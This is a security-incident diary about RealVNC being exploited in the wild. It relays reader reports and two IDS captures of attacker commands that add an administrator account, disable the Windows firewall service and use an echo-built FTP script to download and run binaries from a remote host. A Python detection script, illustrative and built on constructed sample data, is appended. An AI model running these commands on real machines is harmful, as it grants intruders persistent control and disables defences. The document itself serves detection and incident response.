RealVNC exploits in the wild
Active use of RealVNC to break into systems is being reported to us.
If you can share more details or just can report attempts, please let us know.
If you have any RealVNC exposed, check whether you have been compromised, and if not, take measures immediately. If you want an inherently more secure solution, check how to run VNC over SSH on your specific platform.
See more on the vulnerability in the May 15th diary by Kyle Haugsness.
[updates below]
List of exploits reported to us by our readers:
It sure looks like these machines are slowly getting owned one by one ...
- Austin from the UK reports that all shared printers in his office started to print:
Dear Network Administrator.
Please do not be alarmed.
My team is network security specialist.
You are using a vulnerable version of VNC.
Please upgrade your version soon.
We have not accessed your data but we could have.
Have a nice day
The intrusion reportedly happened on a workstation where a visitor left a VNC server running.
He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".
- An anonymous report about the installation of tools typical of the warez and hacker crowd, such as Serv-U and pwdump.
- Mike reported on a machine getting hacked and sent us what his IDS caught of it:
net user [user] [pass] /ADD
net localgroup Administrators [user] /ADD
net stop sharedaccess
sc delete sharedaccess
echo open [IP] [port] > ftptmp
echo user [ftpuserinfo] >> ftptmp
echo get usercontrol.exe >> ftptmp
echo get helpservice.svc >> ftptmp
echo get JAcheck.ini >> ftptmp
echo get JAcheck.dll >> ftptmp
echo bye >> ftptmp
ftp -n -s:ftptmp
del ftptmp
usercontrol /i
net start "ms system service"
Analysis by fellow handler Scott indicated that it adds a user with admin rights and installs what looks like Serv-U on the machine. Perhaps more happened earlier or later, or simply was not caught.
- An anonymous user reports: "We have been using RealVNC 4.1.1 and have been experiencing successful unauthorized connections to our machines. Also, we have seen increased traffic on our network which looks like scanning, some network printers have also been printing pages of gibberish." He concluded with "We are currently upgrading all VNC servers to 4.1.2."
- Another anonymously reported attack on port 5900 (also an IDS capture); since only the port is known, the RealVNC angle is only an assumption at this point:
cd %WINDIR%\system32
echo open [IP] [PORT] >>ms32
echo [user] >>ms32
echo [pass] >>ms32
echo get pack.exe>>ms32
echo get Iass.exe>>ms32
echo get mssd.ini>>ms32
echo get fport.exe>>ms32
echo get op.exe>>ms32
echo get pskill.exe>>ms32
echo bye>>ms32
ftp -v -s:ms32
Iass.exe /I
ipconfig
net start dnsd
pack.exe
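As an added example (not code from the diary or its readers), the Python script below turns the steps the two IDS captures above have in common (account creation, addition to Administrators, stopping or deleting the sharedaccess firewall service, an ftp script assembled with echo and run with -s:) into simple detection rules and runs them over constructed command-line telemetry. The sample lines, the rule weights and the verdict threshold are assumptions for illustration.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (not real data), modelled on the two captures
# above: command lines as an IDS or command-line audit log would present them.
SAMPLE_COMMANDS = [
    "net user backdoor s3cret /ADD",
    "net localgroup Administrators backdoor /ADD",
    "net stop sharedaccess",
    "sc delete sharedaccess",
    "echo open 10.0.0.5 21 > ftptmp",
    "echo get usercontrol.exe >> ftptmp",
    "ftp -n -s:ftptmp",
    "del ftptmp",
    'net start "ms system service"',
    "ipconfig",
]
# Ordinary admin activity, to show that a lone hit does not raise the verdict.
BENIGN_COMMANDS = ["ipconfig", "net start spooler", "echo hello > out.txt"]

# (rule name, pattern, weight). Patterns follow the captured sessions; the
# weights and the verdict threshold in analyze() are assumptions.
RULES = [
    ("local account created", re.compile(r"^net\s+user\s+\S+\s+\S+\s+/add", re.I), 3),
    ("account added to Administrators",
     re.compile(r"^net\s+localgroup\s+administrators\s+\S+\s+/add", re.I), 3),
    ("sharedaccess (firewall/ICS) stopped or deleted",
     re.compile(r"^(net\s+stop|sc\s+delete)\s+sharedaccess", re.I), 3),
    ("ftp script assembled with echo",
     re.compile(r"^echo\s+(open|get|user|bye)\b.*>>?\s*\S+", re.I), 1),
    ("scripted ftp transfer", re.compile(r"^ftp\s+.*-s:\S+", re.I), 2),
    ("service started", re.compile(r"^net\s+start\s+", re.I), 1),
]

def analyze(commands: List[str]) -> Dict[str, object]:
    # First matching rule per line wins; the score accumulates over the session.
    hits: List[str] = []
    score = 0
    for line in commands:
        for name, pattern, weight in RULES:
            if pattern.search(line.strip()):
                hits.append(name)
                score += weight
                break
    # One "net start" or echo redirect is routine; the combination of several
    # distinct steps is what characterises the captured sessions.
    distinct = len(set(hits))
    flagged = score >= 6 and distinct >= 3
    return {"score": score, "distinct_rules": distinct, "hits": hits,
            "verdict": "likely post-exploitation" if flagged else "benign/inconclusive"}
```

Run against exported command-line audit events or IDS-reconstructed sessions; the sharedaccess rule alone is worth alerting on, since stopping it disables the Windows firewall.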
--
Swa Frantzen -- Section 66